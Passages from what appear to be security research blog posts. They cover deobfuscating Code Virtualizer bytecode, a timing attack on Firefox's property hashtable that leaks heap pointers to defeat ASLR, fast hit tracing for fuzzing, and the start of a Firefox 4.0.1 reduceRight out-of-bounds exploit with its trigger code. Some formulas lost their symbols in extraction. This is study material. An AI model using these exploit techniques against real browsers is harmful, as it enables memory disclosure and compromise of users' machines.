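            emitted.append('%s = %s' % (addr[1], stack.pop()))
    return emitted

prog = [('load_ptr', 'eax'), ('store_addr', None), ('load_mem', None),
        ('load_const', 0x1111), ('xor', None), ('store_eflags', None),
        ('load_ptr', 'eax'), ('store_addr', None), ('store_mem', None)]
assert run(prog) == ['eax = eax ^ 0x1111']   # i.e. xor eax, 1111h
```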

DeCV does not implement full x86 recovery. I included an example of how this could be implemented, if anyone is interested — recover_x86.py reads a short CVL snippet and translates it back to assembly using the method described above.

CVL -> x86 translation is the easiest part of the CV puzzle; the real problem is to extract the CVL given just an obfuscated binary.

Each protected binary contains a virtual machine capable of executing a CVL program ‘compiled’ to bytecode. The interpreter doesn’t differ from other virtual machines:

    dispatch:                ;(deobfuscated and simplified version)
        lodsb
        movzx eax, al
        jmp dword ptr [edi+eax*4]

‘esi’ points to the bytecode, ‘edi’ points to a table of handlers for different virtual instructions. For example, the ‘load ptr <reg>’ instruction is implemented as:

    lodsb
    movzx eax, al
    lea eax, [edi+eax*4]
    push eax

The byte pointed to by ‘esi’ is the register’s offset in the register structure pointed to by ‘edi’.

The decompilation process seems obvious — just take the bytecode, analyze which handlers are executed, recover the CVL and then translate it back to x86. This indeed works, assuming we can tell which handlers implement which CVL instructions. There are two problems:

– all handlers are obfuscated to the point where it’s not possible to identify their semantics,

– handlers’ parameters and the bytecode itself are encrypted with a dynamic key (ebx), so even after all handlers are identified, their parameters are still unknown.

In order to deobfuscate handlers, DeCV performs a set of compiler optimizations on them: constant propagation and folding, dead code elimination, peephole optimizations, etc. When a handler’s implementation stops changing (a fixpoint is reached), we can compare it to a set of original handlers extracted from the CV protector binary. Finding a match is equivalent to identifying the CVL instruction implemented by the handler. This is the same method as described in [3]. In [4], Rolf applies compiler opts during a different stage (CVL->x86).

There’s one problem with this approach that isn’t mentioned anywhere — CV can obfuscate a handler’s control flow by inserting random conditional jumps into its body. Fortunately, this obfuscation isn’t very complex — there’s only one correct path through the handler and it doesn’t change between executions. This means that the conditions tested during branching do not depend on variables, but on constants (in other words, they evaluate to constants). It should be possible to simply emulate all code up to the branch point to decide which path should be taken. It turns out it’s not that simple. Consider this code:

xor eax, ebx
xor ebx, eax
xor eax, ebx

a.k.a. the xor-swap trick. The above sequence is equivalent to ‘xchg eax, ebx’.

My first attempt at emulation was to have three types of values: symbolic registers, concrete constants and unknowns. The above sequence is problematic, because if eax=const, ebx=unknown, then eax turns into an unknown after the first xor and there’s no way to recover it. Notice that we can’t just set all registers to concrete values at the beginning, because then we would miss real conditional jumps (there are handlers that have ‘real’ branches in them) and we need to identify branches that really do depend conditionally on input.
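The failure mode is easy to reproduce with a minimal three-valued evaluator (a sketch of that first attempt; UNKNOWN models the third value):

```python
# Values are either concrete ints or the special UNKNOWN marker.
UNKNOWN = object()

def xor(a, b):
    # any operation touching an unknown yields an unknown
    if a is UNKNOWN or b is UNKNOWN:
        return UNKNOWN
    return a ^ b

def emulate_xor_swap(regs):
    regs['eax'] = xor(regs['eax'], regs['ebx'])
    regs['ebx'] = xor(regs['ebx'], regs['eax'])
    regs['eax'] = xor(regs['eax'], regs['ebx'])
    return regs

# eax starts as a known constant; a real xchg would move it into ebx,
# but the naive lattice degrades both registers to UNKNOWN:
r = emulate_xor_swap({'eax': 0x1234, 'ebx': UNKNOWN})
```

After the sequence r['ebx'] should hold 0x1234, yet both registers end up UNKNOWN, which is exactly why the code has to be optimized before emulation.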

DeCV solves this problem by applying optimizations to code before a branch and then emulating the result. This way all nasty corner cases like the swap trick are removed and it’s possible to compute the conditions (by simple emulation) and decide jumps. After all fake branches are removed, the deobfuscation process can proceed like in the branchless case. Note that only a single path in the control flow graph should be followed — it’s not necessary to deobfuscate all of the CFG nodes.

With all handlers deobfuscated it’s easy to extract their parameter decryption procedures. Every handler that requires a parameter decrypts it using a unique function consisting of a combination of add/sub/xor instructions. After collecting all of these decryption functions it’s possible to decrypt the whole CVL program and all parameters used by handlers. Having all of this information is equal to decompiling the obfuscated CVL program.
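The shape of such a decryptor can be sketched as follows. Everything here is hypothetical: the ops, the constants and the way the dynamic key enters are illustrative, not extracted from CV:

```python
MASK = 0xFFFFFFFF  # 32-bit arithmetic

def make_decryptor(steps):
    # steps: ('add'|'sub'|'xor', constant) pairs recovered from a
    # deobfuscated handler; returns a parameter-decryption function.
    def decrypt(value, key):
        value = (value ^ key) & MASK  # mixing in the key this way is an assumption
        for op, c in steps:
            if op == 'add':
                value = (value + c) & MASK
            elif op == 'sub':
                value = (value - c) & MASK
            else:
                value = (value ^ c) & MASK
        return value
    return decrypt
```

Collecting one such function per handler is what makes decrypting the whole bytecode possible.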

DeCV will automatically perform all tasks including:

– locating the handlers table,

– locating the main dispatcher,

– collecting the handlers’ bodies split with unconditional jumps.

The decompilation takes a few seconds at most, depending on how complicated the VM is. The output is printed in IDA’s output window. DeCV was tested with IDA 6.2 and IDAPython 1.5.3. Example output:

vms found: 1
0x40740e
vm: 0
0x00000000 000[07] load ptr eflags
0x00000002 001 store addr
0x00000003 018 store dword [addr]
(…)

0x40740e is the VM’s entry point. The first column is the instruction’s offset (in bytecode), the second is the handler’s id (see the clean_handlers dir), and values in brackets (like [07]) are parameters.

DeCV was well tested on small, synthetic binaries protected with Code Virtualizer 1.3.8.

There are some bugs in IDA that might require manual intervention during the deobfuscation process — see the README.

Sources on github. Typical decompilation output on pastebin.

**References**

1. http://en.wikipedia.org/wiki/Stack-oriented_programming_language

2. http://www.eng.utah.edu/~cs5470/schedule/Lec21.pdf

3. http://www.woodmann.com/forum/entry.php?115-Fighting-Oreans-VM-(code-virtualizer-flavour)

4. http://static.usenix.org/event/woot09/tech/full_papers/rolles.pdf

5. http://oreans.com/codevirtualizer.php

6. http://tuts4you.com/download.php?view.2640

Consider a hash table using double hashing [1]. Checking if a key belongs to a hash table T can be expressed as:

def lookup(T, k):
    h1 = hash1(k)
    h2 = hash2(k)
    idx = h1
    while 1:
        if is_free(T[idx]):
            return False
        s = T[idx]  # structure holding (k,v)
        if s.k == k:
            return True
        idx += h2
        idx = idx % size(T)

Note this can’t loop forever if hash2 always returns something relatively prime to size(T) and T is never 100% full (FF keeps both of these conditions true).
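A quick way to convince yourself of that termination argument: as long as the step is relatively prime to the table size, the probe sequence visits every slot before repeating.

```python
from math import gcd

def probe_sequence(start, step, size):
    # indices visited by idx = (idx + step) % size until the walk closes
    idx, seen = start, []
    while True:
        seen.append(idx)
        idx = (idx + step) % size
        if idx == start:
            return seen

# gcd(5, 16) == 1: the walk covers the whole table, so as long as a free
# slot exists the lookup loop must eventually reach it
assert gcd(5, 16) == 1
assert sorted(probe_sequence(3, 5, 16)) == list(range(16))
# gcd(6, 16) == 2: the walk closes early and misses half of the slots
assert len(probe_sequence(0, 6, 16)) == 8
```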

Firefox is nice enough to store certain kind of pointers and user supplied integers in the same hash table. All of the magic happens in this function:

file: js\src\jsscope.cpp
function: Shape ** PropertyTable::search(jsid id, bool adding)

lookup(T, k) is an abbreviation of T.search(k, false).

In order to lay out keys in T as described in part 1:

we set properties of a javascript object. JS code:

obj[x] = 1;

translates to an insertion into T, and if x is an integer, we have full control over where exactly in T it’s going to be stored. The hash functions used by FF are (all operations modulo 2^32):

def h(x):
    return x * GOLDEN

def hash1(x, shift):
    return h(x) >> shift

def hash2(x, log2, shift):
    return (h(x) << log2) >> shift

where GOLDEN is an odd constant (derived from the golden ratio), and shift and log2 are parameters derived from the table’s size.

In order to set T[i], we need to find x s.t. hash1(x) = i. Since GOLDEN is relatively prime to 2^32, it has a multiplicative inverse [2] INV, and solving for x yields x = INV*(i << shift). This x would be the key to use if integers passed from JS were not mangled, but unfortunately they are — instead of x, the key being added to the table is a tagged value derived from x (this is related to how FF tags [3] pointers). To accommodate for this, we compute x’ (the value whose tagged form equals x) and use it as the property name.

Now **obj[x’]=1;** will result in setting T at the position determined by the tagged form of x’, and that position equals i.

The equality holds because the mangling can be inverted for the keys we need (both GOLDEN and INV are odd).

Using these formulas, we fill T (mixing python and js pseudocode):

obj = {}
for i in range(N):
    x' = calc_x(i)
    obj[x'] = 1  # this results in T[i] being set
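The modular-inverse step behind calc_x can be sketched like this. 0x9E3779B9 is the classic 32-bit golden-ratio multiplier, used here as a stand-in; FF’s exact constant and shifts are not reproduced:

```python
GOLDEN = 0x9E3779B9   # assumed value: the usual 32-bit golden-ratio constant
MOD = 1 << 32

# GOLDEN is odd, hence relatively prime to 2**32, hence invertible mod 2**32
INV = pow(GOLDEN, -1, MOD)

def invert_h(t):
    # find x such that h(x) = x*GOLDEN == t (mod 2**32)
    return (t * INV) % MOD
```

Multiplying invert_h’s output by GOLDEN (mod 2^32) gives back the target value, which is what lets us choose keys that land at a prescribed slot.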

How to use this crafted table to leak information?

Invoking **obj.hasOwnProperty(str)** is equivalent to lookup(T, str), so if we make enough JS objects (strings in this POC) we will eventually find one that takes considerably longer to check than others. Let’s call this object Mstr. Recall that the running time of lookup is proportional to the length of Mstr’s chain, so longer checking means a longer chain.

Using the technique described in part 1, we can learn elements belonging to Mstr’s chain. Let’s express them as (e_1, …, e_n).

Part 1 describes how to recover h2 with high probability, by computing the gcd of a specific set. We will prove that the “exponentially low probability for failure” claim is correct and discuss a case where the described algorithm can fail.

Let D be the set of differences of randomly chosen elements of Mstr’s chain, and let g = gcd(D) (note that h2 divides g). What’s the probability that g = h2?

An equivalent question is to ask about the probability of gcd = 1 for a set of random integers. To see that, consider what happens if we divide all elements of D by h2, or multiply them all by h2.

Nymann asked himself the same exact question in 1972 and proved [5] that the probability of k random integers being relatively prime is 1/ζ(k), where ζ is the Riemann zeta function [6]. I think it’s pretty cool that zeta made its way to a blog post about hashtables in Firefox :D. Yet another grave reason to solve the related millennium problem [8] ;).
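A quick Monte Carlo sanity check of Nymann’s result: for k = 2 the fraction of coprime tuples should be close to 1/ζ(2) = 6/π² ≈ 0.61, and it climbs toward 1 quickly as k grows.

```python
import random
from math import gcd, pi

def coprime_prob(k, trials=20000, seed=1):
    # fraction of k-tuples of random integers with gcd == 1
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        g = rng.randrange(1, 10**9)
        for _ in range(k - 1):
            g = gcd(g, rng.randrange(1, 10**9))
        hits += (g == 1)
    return hits / trials

assert abs(coprime_prob(2) - 6 / pi**2) < 0.02   # ~1/zeta(2)
assert coprime_prob(4) > 0.9                     # 1/zeta(4) ~ 0.924
```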

It’s easy to see that exponents work in our favor. Since ζ(k) tends to 1 as k grows (the most significant term of ζ(k) - 1 is 2^-k), the probability 1/ζ(k) that the gcd equals 1 approaches 1 exponentially fast in terms of k.

The above reasoning works when the sequence of elements of Mstr’s chain is monotonic, meaning that h2 was small enough for the indices to never “wrap” around the end of the table. There’s a second case, which looks like this, when plotted on a graph:

Elements are scattered around both ends of the filled region. This happens when h2 is big enough to “jump over” the free region at the end of the hashtable.

The gcd in that case is most likely going to be equal to 1, even though the real h2 isn’t. There’s a fast way to deal with this problem.

Let m = size(T), so that we can express the differences of elements of Mstr’s chain as:

e_2 - e_1 = c_1*h2 mod m

.

.

e_n - e_{n-1} = c_{n-1}*h2 mod m

Notice that the range of the possible wrap counts is small: at the low end a difference didn’t wrap around m at all, and at the high end it wrapped once.

Knowing that, we can iterate over all possible values of the wrap count, solve the equation for h2 (using the linear congruence theorem [7]) and then compute:

e_2 - e_1 mod m

.

.

e_n - e_{n-1} mod m

If the h2 we found was correct, then it divides all of the above differences (m = size(T)). The probability that this condition is true, but h2 is incorrect, is (again) exponentially low.

Part 1 discusses how to find the chain’s starting point s, knowing a single element of the chain and its period h2.

Having s and h2, we can reconstruct ptr(Mstr) exactly.

As we can see, leaking information is not the same thing as reading memory. My proposition is to define “leaking” as any procedure leading to diminishing the number of possible states the attacked program might be in. Let’s say a program has 2 bits of memory m. Let’s assume we learned (by any means) that m[0] xor m[1] = 1. This condition allows only (0,1) or (1,0), so the number of possible states is 2, instead of 4. The “memory disclosure” definition fails to account for these “partial” leaks and side channel leaks, while the “entropy” one doesn’t.

**References**

1. http://en.wikipedia.org/wiki/Double_hashing

2. http://en.wikipedia.org/wiki/Modular_multiplicative_inverse

3. http://en.wikipedia.org/wiki/Tagged_pointer

4. http://en.wikipedia.org/wiki/Linear_regression

5. J. E. Nymann. “On the Probability that k Positive Integers Are Relatively Prime.” J. Number

Theory 4 (1972):469-73.

6. http://en.wikipedia.org/wiki/Riemann_zeta_function

7. http://en.wikipedia.org/wiki/Linear_congruence_theorem

8. http://en.wikipedia.org/wiki/Millennium_Prize_Problems#The_Riemann_hypothesis

It turns out these attacks can be applied in a more prosaic context — instead of encryption keys, they can help us leak pointers to objects on the heap or, if we are lucky, in .code/.data sections of the targeted application. Leaking a pointer with a fixed RVA reveals the imagebase, so ASLR becomes ineffective (ROP). Leaking a heap pointer makes exploitation of WRITE-ANYWHERE bugs easier, so in both cases it’s a win :).

This post provides a high-level description of a POC implementation of a timing attack on a hashtable used in Firefox (tested on v4, v13, v14). The POC is quite fast (it takes a few secs) and leaks a heap pointer to a JS object. A detailed explanation will be provided in a different post (part 2).

Consider a hash table using double hashing [2]. In this scheme, keys are hashed like so: idx = hash1(k) + i*hash2(k) mod size(T), where hash1, hash2 are hash functions and size(T) is the size of the hash table. During insertion, i is incremented until a free slot is found, like shown below:

Lookups are performed the same way — i is incremented until the key value in a slot matches, or the slot is empty.

It’s easy to see that the execution time of lookup(T, k) is proportional to the length of k’s chain (number of collisions). In the above example the chain has length 2, since there were two collisions. The idea is to use this fact to learn the value of the key being looked up. Firefox is nice enough to store pointers and user supplied integers in the same hashtable (not always, but in specific circumstances), so we can control the table’s layout completely. It’s worth noting that only the object’s pointer is used in hashing, so the lookup time depends on the pointer alone (contents of strings are not taken into account).

Here’s how we are going to layout keys inside the table (using JS integers):

Yellow slots are taken, white are free. We have to leave some free space, since FF grows / shrinks tables dynamically, based on the number of taken slots.

If we keep generating JS objects (with different pointers) and trying to look them up in T, we will finally find one that takes considerably longer than others to look up. Let’s call this object Mstr (M – max., str – string, since we are using strings (atoms, to be more precise) in the POC) and the lookup time of Mstr: Tmax.

Here’s an example of a long chain for Mstr (Firefox uses subtraction instead of addition while hashing):

In this example .

In order to find h2, we will use the observation that h2 divides e_i - e_j for any two elements e_i, e_j of Mstr’s chain (this isn’t always true, but I’ll omit the second case for brevity). Indeed, e_i - e_j = (s + i*h2) - (s + j*h2) = (i - j)*h2. If we collect enough of the chain’s elements, we can calculate their differences and take their gcd, which equals h2. This equality holds with high probability — the chance of failure decreases exponentially with the number of collected elements (the most significant term of the exact formula is 2^-n).
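The gcd trick in a few lines of Python (the chain values below are fabricated for illustration):

```python
from functools import reduce
from math import gcd

def recover_h2(elems):
    # gcd of differences of consecutive collected chain elements
    diffs = [b - a for a, b in zip(elems, elems[1:])]
    return reduce(gcd, diffs)

# chain s, s + h2, s + 2*h2, ...; pretend we leaked these 8 elements of it
s, h2 = 100, 36
leaked = [s + i * h2 for i in (0, 3, 7, 12, 20, 33, 41, 49)]
assert recover_h2(leaked) == h2   # gcd(3,4,5,8,13,8,8) == 1, so h2 pops out
```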

How to find elements on Mstr’s chain? Remember that the keys used to fill T are integers. We can remove a key and check if Tmax changed significantly. If it did, we know for sure that the removed key belongs to the chain.

Here’s an example:

We removed a key from the first half of the chain and this caused it to shorten, so the lookup time after removal (T’) is going to be lower than Tmax. In order to deal with inaccuracies of the JS clock (Date object), we will accept only elements for which the drop Tmax - T’ is large enough, so we are reducing our interest to the first half of the chain (red line on the diagram above). Without this restriction we would be unable to distinguish between keys that don’t belong to the chain and keys at the very end of it.

Obviously, removing keys one by one is too slow. Removing them in chunks in a bisect-like manner is better, but still has a running time proportional to size(T). It’s faster to use a randomized algorithm. Let’s say we chose k random elements to remove. The probability that we failed to hit any element of Mstr’s chain is (1 - L/size(T))^k, where L is the chain’s length. The exponent is working in our favor, but we need to estimate L somehow, so that we don’t waste too much time — an underestimate of L is as good as the exact value, but it requires a greater k, so more elements to test.

We can estimate L by collecting **integers** with increasingly long chains, and using their lookup times to create a linear regression model [3]. The model will provide a linear function that interpolates the collected data. Estimating L is then a matter of inverting that function at Tmax. Below is an example of collected data points and a linear function that fits them best. The Y axis is time and X is the chain’s length.
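The estimation step can be sketched with a plain least-squares fit (the timing numbers are made up):

```python
def fit_line(xs, ys):
    # ordinary least squares for y = a*x + b
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    a = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / \
        sum((x - mx) ** 2 for x in xs)
    return a, my - a * mx

def estimate_chain_len(t_max, a, b):
    # invert the model t = a*len + b at the observed lookup time
    return (t_max - b) / a

lengths = [1, 2, 4, 8, 16]
times = [3.0, 5.0, 9.0, 17.0, 33.0]   # fake data lying on t = 2*len + 1
a, b = fit_line(lengths, times)
```

With this fake data, an object whose lookup took 21 time units is estimated to sit on a chain of length ~10.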

Having L we can pick k so that the probability of failure is acceptably small. After we finally pick k, we choose k random keys and remove them. If the lookup time dropped below Tmax, it means that in the set we chose, there’s at least one key that belongs to the first part of the chain — we need to find it. In order to do so, we bisect the set of removed keys until only one is left. Running time: O(log k), if we disregard the time necessary to add / remove keys from T.

After collecting enough (8 in the POC) elements of Mstr’s chain, we compute h2 as the gcd of their differences. The only thing left is to find s — the starting point.

Recall T’s layout:

Consider how Tmax changes when removing various keys — we remove them separately and then measure Tmax each time.

– if we remove 5 or 7, Tmax will not change, since 5, 7 do not belong to Mstr’s chain,

– removing 4 or 6 will cause Tmax to drop, since 4 and 6 are in the first half of the chain,

– removing 8 will cause Tmax to drop and removing 10 will have no effect on Tmax.

These 3 conditions are sufficient to recognize if we are inside, outside, or at the edge of the chain.

The algorithm to detect the starting point is simple. Start from the element with the smallest index (so it’s the closest collected element to the starting point). With the h2 we found earlier, do a binary search using the criteria above (inside, outside, hit) until hitting the edge (starting point).

With s and h2 it’s possible to recover the key, which equals ptr(Mstr).

This is a simplified description. There’s quite a lot of details that were omitted in this post for brevity, but are required for this trick to work.

I suspect (this type of) timing attacks will be useful for leaking information not only from browsers. The most likely candidates seem to be kernels and perhaps even remote servers. (EDIT: I mean this in ASLR context, not secret-password context).

Here’s the POC. Download all files and open lol.html (in Firefox ;)) to see how it works. The POC was tested on XP, W7 and Linux. Send me an email if it doesn’t work for you.

1. http://en.wikipedia.org/wiki/Timing_attack

2. http://en.wikipedia.org/wiki/Double_hashing

3. http://en.wikipedia.org/wiki/Linear_regression

The idea is:

- collect a lot of sample files
- let your target application parse them all
- collect the set of basic blocks executed for every file
- calculate the minimal set of samples that covers all of the collected basic blocks
- flip random bytes in files from that set and wait for a crash

It’s a simple process, but all implementations I heard of suffer from an interesting performance bottleneck in the basic block tracing part.

If your tracer takes >1min per file, you can speed it up to take only a few seconds, with just a few simple observations.

The tracing part is generally implemented like this:

- instrument the binary with PIN and install a common hook for every BB
- when a BB is executed, control is transferred to the hook, which stores the BB address in a “fast” data structure implementing a set, like a red-black/AVL tree.
- run the application on a sample file and terminate it when the CPU usage drops below some cutoff value.

There are a few problems with this approach, but they are easy to solve.

First, let’s distinguish between tracing and hit tracing. In both cases we will assume basic block (BB) granularity.

1. During **tracing**, we are interested in collecting an ordered sequence of BBs, so we want to know which BBs were executed and in what order.

2. During **hit tracing**, we are only interested in collecting a set of executed BBs, so we don’t care if a BB was hit more than once.

From this point, “tracing” should be interpreted as 1, and “hit tracing” as 2, the same goes for “tracer” and “hit tracer”.

For example, consider the following function:

a: dec eax
   jnz a
b: test eax, eax
   jz d
c: nop
d: nop

Tracing that example for eax=3 would produce a list: [a,a,a,b,d], and hit tracing, a set: {a,b,d}.

It’s easy to see that when implementing a hit tracer, hooks can be dynamically removed as soon as a BB is executed. Indeed, since we save BBs in a set, any attempt to store the same one more than once is a waste of time.

To make the bigger picture clear:

- install hooks in all BBs
- when a BB is hit, execution transfers to the hook
- the hook saves the BB’s address in a set
- the hook uninstalls itself from the hit BB
- the hook transfers control to the originating BB
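A toy Python model of that bookkeeping (illustrative only; the real hook lives inside the target or, as later in this post, in an external debugger):

```python
# Self-uninstalling hooks: the first hit records the BB and restores the
# original byte, so every later execution of that BB runs at native speed.
class HitTracer:
    def __init__(self, image, bb_addrs):
        self.image = bytearray(image)
        self.orig = {}                      # addr -> original byte
        self.hits = set()
        for addr in bb_addrs:               # install: patch each BB start
            self.orig[addr] = self.image[addr]
            self.image[addr] = 0xCC         # int 3

    def on_hit(self, addr):
        self.hits.add(addr)                     # save the BB address
        self.image[addr] = self.orig.pop(addr)  # uninstall the hook
        # ...then resume execution at addr

tracer = HitTracer(b"\x90" * 16, bb_addrs=[0, 5, 9])
tracer.on_hit(5)
```

After the hit, offset 5 is a NOP again, while offsets 0 and 9 are still patched.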

We’ve eliminated the first problem of the MM (Miller’s method ;)). The second problem is termination: when should we stop collecting BBs?

Watching the CPU is counterproductive: if the processor is busy, it has to be in some kind of a loop (unless you feed it with gigabytes of consecutive NOPs :p). If it’s in a loop, it’s pointless to wait for an extended period of time, because you’re going to collect all of the loops’ BBs at the very beginning anyway.

A better (faster) approach is to watch how many new BBs we collected in a predefined timestep. To be more precise, let f(t) be the size of the BB set at time t. Using this notation, every dt seconds we check if f(t) > c*f(t-dt). If the condition is true: continue, if not: terminate. This guarantees that we terminate as soon as the set stops increasing fast enough (or a called OS function takes a lot of time, but that can be solved with a big enough dt).

This heuristic is inferior in situations where the target spends a lot of time in disjoint loops: if we have loop1(); loop2(); and loop1 takes a while, then the target will be terminated early, before reaching loop2.

There are a few ways to implement the hit tracer:

– script your favourite debugger

– use PIN/DynamoRIO

– write your own debugger

Scripting ImmDbg, WinDbg, or PyDbg is a bad idea: with >100k breakpoints these tools are likely to fail :). PIN is probably a good tool for this task (it’s a Dynamic Binary Instrumentation tool, after all ;)), but we’ll focus on the last option.

Assuming our target is not open source, we need to find a way to hook all BBs at the binary level. The first solution that comes to mind is:

- use IDA to statically collect all BBs
- patch all of them with a jump to our hook

There are two problems with this approach:

- jumps have to be long (5 bytes), so they might not fit into very small BBs
- IDA isn’t perfect and can produce incorrect results. Patching an address that isn’t the beginning of a BB can (most likely will) lead to a crash.

Solving problem 1 can be either simple and inaccurate or complicated but accurate. A quick solution is to ignore BBs shorter than 5 bytes and patch only the bigger BBs. This can be ok, depending on how many BBs are going to be discarded: if just a few, then who cares ;).

If there’s a lot of them, we’re going to use a different approach. Instead of patching with jumps, we can patch with **int 3** (0xCC) — since it’s only one byte, it will fit everywhere ;).

When a BB is executed, int 3 will throw an exception that needs to be intercepted by our external debugger. This introduces a penalty that’s not present in the jump method: the kernel will have to deliver the exception from the target application to the debugger, and then go back to resume execution of the patched BB. This cost is not present when a jump transfers execution to a hook inside the target’s address space, but it turns out that this delay is negligible.

The debugger contains the hook logic, including a data structure implementing a set. Notice that we can be faster, although by a constant factor, than AVL/RB trees. Having a sorted list of addresses of BBs (call it L), we can “implement” a perfect hash [2]: Hash(BB) = index of BB in L, so our set can be a flat table of bytes of size = size(L). The “insert(BB, S)” procedure is just: S[Hash(BB)]=1, without the cost of AVL/RB bookkeeping/rebalancing :). The cost of Hash(BB) is O(log n) (a binary search), since the list of addresses is sorted.
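A sketch of that flat set, with Python’s bisect standing in for the binary search:

```python
from bisect import bisect_left

class BBSet:
    def __init__(self, sorted_addrs):
        self.L = sorted_addrs                  # sorted list of all BB addresses
        self.S = bytearray(len(sorted_addrs))  # flat byte table, the "set"

    def hash(self, bb):
        return bisect_left(self.L, bb)         # perfect hash: index in L, O(log n)

    def insert(self, bb):
        self.S[self.hash(bb)] = 1              # no tree bookkeeping/rebalancing

    def __contains__(self, bb):
        return self.S[self.hash(bb)] == 1

s = BBSet([0x1000, 0x1040, 0x2000])
s.insert(0x1040)
```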

Solving 2 might seem to be a matter of observing where the patched application crashed and reverting the bytes at that address to the original values. That might work, but doesn’t have to :). If a bad patch results in a bogus jump, the crash address will be completely unrelated to the real origin of the problem!

The correct solution is a bit slow:

def check_half(patches):
    apply_patches(exe, patches)
    crashed = run(exe)
    if crashed:
        revert_patches(exe, patches)
        if len(patches) > 1:
            apply_non_crashing(patches)

def apply_non_crashing(patches):
    fst = half(0, patches)
    snd = half(1, patches)
    check_half(fst)
    check_half(snd)

Starting with a clean exe and a list of patches to apply, we split the list into halves and apply them in order. If a patched version crashes, we revert the changes made and recurse into the halves. At the tree’s bottom, if a single byte causes a crash, we just revert it and return.

It’s easy to see that this algorithm has complexity O(d*log n) (disregarding file ops), where d is the number of defects (bad patches that cause crashes) and n is the total number of patches (basic blocks). The log n factor comes from the fact that we are traversing a full binary tree with 2n-1 nodes.

I didn’t bother comparing with available (hit)tracers, since just judging by the GUI lag, they are at least an order of magnitude slower than the method described. The executable instrumented with int3s has no noticeable lag, compared to the uninstrumented version, at least on manual inspection (try clicking menus, etc).

We’ll benchmark how much (if at all) the monotonicity heuristic is faster than just waiting for a fixed amount of time T. This models a situation where the target takes ~T seconds to parse a file (using ~100% CPU).

Follow these steps to repeat the process yourself:

- download this
- download the first 150 pdf files from urls.txt (scraped with Bing api ;)), delete 50 smallest ones, and place what’s left in ./samples/ dir
- run SumatraPDF.exe and uncheck “Remember opened files” in Options (otherwise the results would be a bit skewed — opening a file for the second time would trigger cache handling code)
- run stats.py and wait for results

Files in the archive:

- SumatraPDF.exe – version without instrumentation (no int3 patches)
- patched.exe – instrumented version
- debug.exe – debugger that’s supposed to intercept and resume exceptions raised from patched.exe
- urls.txt – urls of sample pdf files
- stats.py – benchmarking script

The debugger takes a few parameters:

<exe> <sample file> <dt> <c> <timeout>

where exe is the instrumented executable, sample file is the file to pass as the first parameter to the exe, dt and c have the meaning described above, and timeout is an upper bound on the time spent running the target (the debugger will terminate the target even when new BBs are still appearing). dt and timeout are in milliseconds, c is a float.

Every sample is hit traced two times. The first time, the debugger is run with parameters:

patched.exe <sample> 1000 0.0 2000

meaning there is no early termination — BBs are collected for 2 seconds.

The second time, the debugger is run with:

patched.exe <sample> 200 1.01 2000

meaning the target is terminated early if during 200ms the number of BBs didn’t increase by at least 1%. Here’s the watchdog thread implementing this:

DWORD WINAPI watchdog(LPVOID arg){
    int i, elapsed;
    float old_counter = 0;
    elapsed = 0;
    printf("watchdog start: g_c=%.02f, g_delay=%d, g_timeout=%d\n",
           g_c, g_delay, g_timeout);
    while(1){
        Sleep(g_delay);
        elapsed += g_delay;
        if((float)counter > g_c*old_counter){
            old_counter = (float)counter;
        }
        else{
            break;
        }
        if(elapsed >= g_timeout)
            break;
    }
    dump_bb_tab("dump.txt");
    printf("watchdog end: elapsed: %d, total bbs: %d\n", elapsed, counter);
    ExitProcess(0);
}

It dumps the BB list in dump.txt as a bonus ;).

Speed: **0.37** (smaller is better)

Accuracy: **0.99** (bigger is better)

As expected, the monotonicity heuristic performs better (almost 3x) than just waiting for 2 seconds, for the price of a 1% drop in accuracy.

Note that the 2s timeout is arbitrary and supposed to model a situation when the target is spinning in a tight loop. In such a case watching the CPU is (most likely) a waste of time.

If you want your hit tracer to be fast, then:

- remove the BB hook after first hit
- use simple data structures
- for termination, consider different conditions than watching the CPU

References

1. Charlie Miller, 2010, Babysitting an army of monkeys: an analysis of fuzzing 4 products with 5 lines of Python, http://tinyurl.com/cwp5yde

2. Perfect hash function, http://en.wikipedia.org/wiki/Perfect_hash_function

In this post I’ll show how to exploit this vulnerability on Firefox 4.0.1/Windows 7, by leaking the imagebase of one of Firefox’s modules, thus circumventing ASLR without any additional dependencies.

You can see the original bug report with detailed analysis here. To make a long story short, this is the trigger:

xyz = new Array;
xyz.length = 0x80100000;
a = function foo(prev, current, index, array) {
    current[0] = 0x41424344;
}
xyz.reduceRight(a,1,2,3);

Executing it crashes Firefox:

eax=0454f230 ebx=03a63da0 ecx=800fffff edx=01c6f000 esi=0012cd68 edi=0454f208
eip=004f0be1 esp=0012ccd0 ebp=0012cd1c iopl=0   nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
mozjs!JS_FreeArenaPool+0x15e1:
004f0be1 8b14c8   mov edx,dword ptr [eax+ecx*8] ds:0023:04d4f228=????????

eax holds a pointer to the “xyz” array and ecx is equal to xyz.length-1. reduceRight visits all elements of the given array in reverse order, so if the read @ 004f0be1 succeeds and we don’t crash inside the callback function (foo), the JS interpreter will loop the above code with decreasing values in ecx.

The value read @ 004f0be1 is passed to foo() as the “current” argument. This means we can trick the JS interpreter into passing random stuff from the heap to our javascript callback. Notice we fully control the array’s length, and since ecx is multiplied by 8 (bitshifted left by 3 bits), we can access memory before or after the array, by setting/clearing the 29th bit of the length. Neat :).

During reduceRight(), the interpreter expects jsval_layout unions:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h
274 typedef union jsval_layout
275 {
276     uint64 asBits;
277     struct {
278         union {
279             int32 i32;
280             uint32 u32;
281             JSBool boo;
282             JSString *str;
283             JSObject *obj;
284             void *ptr;
285             JSWhyMagic why;
286             jsuword word;
287         } payload;
288         JSValueTag tag;
289     } s;
290     double asDouble;
291     void *asPtr;
292 } jsval_layout;

To be more specific, we are interested in the “payload” struct. Possible values for “tag” are:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h
 92 JS_ENUM_HEADER(JSValueType, uint8)
 93 {
 94     JSVAL_TYPE_DOUBLE    = 0x00,
 95     JSVAL_TYPE_INT32     = 0x01,
 96     JSVAL_TYPE_UNDEFINED = 0x02,
 97     JSVAL_TYPE_BOOLEAN   = 0x03,
 98     JSVAL_TYPE_MAGIC     = 0x04,
 99     JSVAL_TYPE_STRING    = 0x05,
100     JSVAL_TYPE_NULL      = 0x06,
101     JSVAL_TYPE_OBJECT    = 0x07,
...
119 JS_ENUM_HEADER(JSValueTag, uint32)
120 {
121     JSVAL_TAG_CLEAR     = 0xFFFF0000,
